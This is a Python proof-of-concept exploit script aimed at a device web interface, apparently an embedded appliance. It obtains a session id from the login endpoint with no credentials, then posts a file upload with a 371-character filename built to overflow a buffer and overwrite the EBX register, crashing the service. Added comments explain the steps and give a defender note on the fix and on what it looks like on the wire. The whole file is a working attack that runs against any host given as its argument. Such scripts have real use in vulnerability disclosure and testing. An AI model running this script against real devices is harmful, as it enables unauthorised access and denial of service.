import requests | |
from bs4 import BeautifulSoup | |
import sys | |
# Target host is the single positional argument; there is no usage message,
# so running without an argument raises IndexError here.
host = sys.argv[1]
# Login endpoint used by getsid() and the Referer header sent on every request.
URL = "http://{}/scgi?sid=0&pid=dologin".format(host)
head = {"Referer": "http://{}/scgi?pid=0&action=dologin".format(host)}
# no auth login
payload = {"fd": "Cg=="}
# 10000-byte file body used by docrash().
junk = "E" * 10000
def getsid():
    """Obtain a session id from the login endpoint without credentials.

    POSTs the fixed ``payload`` to ``URL`` (``pid=dologin``) and returns
    characters 9..48 of the ``href`` of the first ``<a>`` in the response.
    Raises AttributeError when the response has no anchor; returns a wrong
    slice if the response layout differs — nothing is validated here.
    """
    # No credentials are sent, only fd=Cg==; the endpoint appears to hand
    # out a usable sid to any network peer, which is a finding on its own.
    r = requests.post(URL, headers=head, data=payload)
    # fudge to get valid SID
    rt = r.text
    soup = BeautifulSoup(rt,"lxml")
    nsid = soup.a  # None when the response contains no <a>
    bsid = nsid.get('href')
    # Fixed offsets into the href — presumably the sid; not checked.
    bsid = bsid[9:49]
    return bsid
def docrash():
    """Send the crash request: an over-long upload filename to the device.

    Builds a 371-character filename (367 filler bytes plus 4 marker bytes),
    sends it with the 10000-byte ``junk`` body to ``pid=uploadfile_name1.htm``
    using a freshly fetched sid, and prints the response body. The HTTP
    status is not checked; any exception from ``getsid`` propagates.
    """
    crash = "A"*367 # buffer to crash
    crash += "C"*4 # overwrites next 4 bytes of EBX
    file = {"foo":"bar"}  # unused
    # requests' 4-tuple is (filename, content, content_type, headers):
    # `crash` is sent as the upload's *filename*, `junk` as the file body.
    files = {"file":(crash,junk, "application/octet-stream", {'Expires':'0'})}
    formURL = "http://"+host+"/scgi?sid="+getsid()+"&pid=uploadfile_name1.htm"
    rf = requests.post(formURL, headers=head, files=files)
    # Defender note: the device-side fix is bounds-checking the upload
    # filename; on the wire, a multipart POST to this endpoint carrying a
    # filename of several hundred bytes is the observable.
    print(rf.text)
if __name__ == "__main__":
    # Entry point: one attempt against the host given as argv[1].
    docrash()